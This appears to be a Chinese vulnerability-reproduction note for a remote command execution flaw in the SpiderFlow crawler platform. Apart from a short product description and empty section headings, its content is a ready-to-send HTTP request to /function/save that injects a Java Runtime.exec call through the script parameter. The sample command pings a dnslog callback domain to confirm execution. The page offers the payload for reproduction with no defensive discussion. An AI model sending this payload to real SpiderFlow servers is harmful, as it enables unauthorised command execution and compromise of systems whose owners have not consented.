SpiderFlow save 远程命令执行漏洞¶
漏洞描述¶
SpiderFlow 平台以流程图的⽅式定义爬⾍,是⼀个⾼度灵活可配置的爬⾍平台
官⽹:https://www.spiderflow.org/
漏洞影响¶
网络测绘¶
漏洞复现¶
主页面
发送请求包执行命令
POST /function/save
id=&name=cmd¶meter=yw&script=}Java.type('java.lang.Runtime').getRuntime().exec('ping chwd71.dnslog.cn');{
